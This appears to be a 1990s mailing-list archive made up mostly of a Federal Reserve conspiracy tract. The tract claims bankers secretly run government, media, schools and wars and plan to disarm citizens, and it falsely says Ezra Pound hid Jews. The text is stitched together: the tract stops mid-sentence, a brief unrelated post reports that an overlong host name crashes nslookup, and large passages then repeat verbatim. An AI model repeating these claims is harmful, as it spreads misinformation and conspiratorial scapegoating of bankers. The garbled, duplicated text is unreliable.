give it to the bankers. The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all." In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions. In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect %2 to 5% of every retail sale from the seller and 18% or more interest from buy- ers. A real stacked deck! POLITICIANS AND BANKERS IN THE SAME LEAGUE Democrat, Republican, and Independent voters have wondered why poli- ticians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people. They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt. Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonder- ful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 the traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel! Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress, after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail. FEDERAL RESERVE SYSTEM AUDIT The Federal Reserve has never been audited by the government. In 1975 a bill H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done. MOUNTING DEBTS AND WARS We, as a people are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people. It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power. Our two large political parties (the "Demopublicans" also call- ed "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency. Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aide." Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions mre in debt to the bankers - which was the real reason for the war in the first place! MORE THAN JUST ECONOMIC RAPE The profits from these massive debts have been used to erect a com- plete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people. These would-be despots kow it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliber- ately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general. Their "war on drugs," as an example, only produces more drug use and a host of relat- ed crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants medio- cre, unthinking, helpless "sheople." Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the found- ation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind. And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation. CONTROLLED NEWS AND INFORMATION This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our peo- ple. The conspiracy is old enough to America so that the system's agents have been for many years in positions such as newspaper publishers, edit- tors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie mak- ers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system. They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renew- al," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even null- ify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people. So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in char- ges and counter-charges designed to confuse them and keep them from under- standing the evil currency system that so silently robs the workers, farm- ers, and business people of the fruit of their labor. And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution. In his book INVENTING REALITY, Michael Parenti wrote: "Ten business and financial corporations control the three major tele- vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat- ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub- lishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper rev- enue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books... While having an abundance of numbers and giving an appearance of di- versity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. New services for dailies through- out the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire ser- vices like Reuters. The ideological viewpoint of these news conduits are pretty much the same, marked by prefabricated standardization of news which is constricting and frightening." In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes: "The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as impor- tant as giving them a choice in politics. If a nation has narrowly con- trolled information it will soon have narrowly controlled politics." When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right- wing extremists," "super-patriots," "bigots," "racists," "facists," or "antisemites." Any name is used to discredit them, and to stop other peo- ple from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores. Some, who are especially vocal in their exposure of the treason com- mitted against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank- ruptcy. Sometimes their businesses and homes are violently raided at gun- point, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below. Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth. Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army. Our wise Founding Fathers wrote the Se- cond Amendment to the Constitution so that the people could protect them- selves against the government. Love of life, interest in your freedom, compassion for humanity, con- cern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our gener- ation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grand- children will own neither car nor home, but will live in "government- owned" apratments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism. Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitious currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery." THE CASE OF EZRA POUND Ezra Pound was a poet, one of America's greatest - if not the great- est. He played a major role in the development of writers and poets, such as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war. During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans. He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years. After which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972. The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a polit- ical prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release. Here are some extracts from Pound's radio talks: . "I think an alliance with Stalin's Russia is rotten." (January 29,1942) ."Liberty is not a right but a duty." (March 8, 1942) ."Sovereignty inheres in the right to issue money. And the American sov- ereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof. And 120 million, 120 million suckers have lamentably failed to insist on the obeservation of this quite decided law.... Now the point at which em- bezzlement of the nation's funds on the part of her officers becomes trea- son can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942) .Quotes read by Pound: 1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson. 2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln. 3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942) .Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943) ."The phase of the usury system which we are trying to analyze is more or less Patterson''s perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943) ."That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Consti- tution." June 30, 1943) THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL Although there has never been a court case that challenged the legal- ity of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI- MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value there- of..." By passing the Federal Reserve Act, Congress abdicated and trans- ferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious. TELL THE PEOPLE America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. Interna- tional bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare. Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At- lanta Georgia, said: "This is a staggering thought. We are completely dependent on the com- mercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are pros- perous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absur- dity of our hopeless position is almost incredible, but there it is. It is the most important subject intelligent persons can investigate and re- flect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon." PRIVATE BANKING In California a very private "non-bank" has been operating successfully for fifteen years. It caters for accounts in gold or Federal Reserve Notes. It is completely private and doesn't report to anyone. It pays in- terest on both gold and Federal Reserve Note balances. Ideally, we need to establish a network of private banks throughout the country, and even- tually throughout the rest of the world. See Chapter Twelve. From cort at ecn.purdue.edu Wed Sep 27 23:13:18 1995 From: cort at ecn.purdue.edu (cort) Date: Wed, 27 Sep 95 23:13:18 PDT Subject: NIS library code exposure (Unix network exposure) In-Reply-To: <14539.812260953@ghoti.mcom.com> Message-ID: <199509280613.BAA21957@en.ecn.purdue.edu> [....] > Do you have any daemons that run as root and do networking? Are you > sure that all of them check the length of the host name before passing > it to gethostbyname? [....] On Linux: ping [huge host name] works ftp [huge host name] works finger [huge host name] works nslookup [huge host name] ... CRUNCH (Segmentation fault) From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:14:18 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 27 Sep 95 23:14:18 PDT Subject: No Subject Message-ID: <199509280613.HAA02274@utopia.hacktic.nl> that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so- called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper,ink, and a few dollars in salaries and office costs for each tansaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below. THE COST TO YOU? PRACTICALLY EVERYTHING In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen. The Federal Government began to grow like an invisible cancer in its ear- ly stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per cit- izen. Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim. Today in 1992 the federal debt is over $4 trillion. (And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Gov- ernment has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse. The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy. Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs.. I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this won- derful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour rea- ches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows. The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real pro- perty (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not. It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs! Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said: "Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again. However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to re- main the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits." Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal govern- ments borrow billions in our name, squander it, then confiscate our earn- ings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our childern pay after we die. If we cannot pay, the same government sends the police to take our property and give it to the bankers. The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all." In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions. In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect %2 to 5% of every retail sale from the seller and 18% or more interest from buy- ers. A real stacked deck! POLITICIANS AND BANKERS IN THE SAME LEAGUE Democrat, Republican, and Independent voters have wondered why poli- ticians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people. They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt. Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonder- ful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 the traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel! Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress, after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail. FEDERAL RESERVE SYSTEM AUDIT The Federal Reserve has never been audited by the government. In 1975 a bill H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done. MOUNTING DEBTS AND WARS We, as a people are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people. It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power. Our two large political parties (the "Demopublicans" also call- ed "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency. Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aide." Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions mre in debt to the bankers - which was the real reason for the war in the first place! MORE THAN JUST ECONOMIC RAPE The profits from these massive debts have been used to erect a com- plete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people. These would-be despots kow it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliber- ately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general. Their "war on drugs," as an example, only produces more drug use and a host of relat- ed crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants medio- cre, unthinking, helpless "sheople." Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the found- ation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind. And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation. CONTROLLED NEWS AND INFORMATION This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our peo- ple. The conspiracy is old enough to America so that the system's agents have been for many years in positions such as newspaper publishers, edit- tors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie mak- ers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system. They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renew- al," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even null- ify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people. So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in char- ges and counter-charges designed to confuse them and keep them from under- standing the evil currency system that so silently robs the workers, farm- ers, and business people of the fruit of their labor. And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution. In his book INVENTING REALITY, Michael Parenti wrote: "Ten business and financial corporations control the three major tele- vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat- ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub- lishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper rev- enue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books... While having an abundance of numbers and giving an appearance of di- versity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. New services for dailies through- out the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire ser- vices like Reuters. The ideological viewpoint of these news conduits are pretty much the same, marked by prefabricated standardization of news which is constricting and frightening." In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes: "The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as impor- tant as giving them a choice in politics. If a nation has narrowly con- trolled information it will soon have narrowly controlled politics." When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right- wing extremists," "super-patriots," "bigots," "racists," "facists," or "antisemites." Any name is used to discredit them, and to stop other peo- ple from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores. Some, who are especially vocal in their exposure of the treason com- mitted against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank- ruptcy. Sometimes their businesses and homes are violently raided at gun- point, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below. Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth. Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army. Our wise Founding Fathers wrote the Se- cond Amendment to the Constitution so that the people could protect them- selves against the government. Love of life, interest in your freedom, compassion for humanity, con- cern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our gener- ation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grand- children will own neither car nor home, but will live in "government- owned" apratments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism. Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitious currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery." THE CASE OF EZRA POUND Ezra Pound was a poet, one of America's greatest - if not the great- est. He played a major role in the development of writers and poets, such as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war. During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans. He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years. After which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972. The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a polit- ical prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release. Here are some extracts from Pound's radio talks: . "I think an alliance with Stalin's Russia is rotten." (January 29,1942) ."Liberty is not a right but a duty." (March 8, 1942) ."Sovereignty inheres in the right to issue money. And the American sov- ereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof. And 120 million, 120 million suckers have lamentably failed to insist on the obeservation of this quite decided law.... Now the point at which em- bezzlement of the nation's funds on the part of her officers becomes trea- son can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942) .Quotes read by Pound: 1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson. 2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln. 3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942) .Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943) ."The phase of the usury system which we are trying to analyze is more or less Patterson''s perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943) ."That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Consti- tution." June 30, 1943) THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL Although there has never been a court case that challenged the legal- ity of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI- MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value there- of..." By passing the Federal Reserve Act, Congress abdicated and trans- ferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the 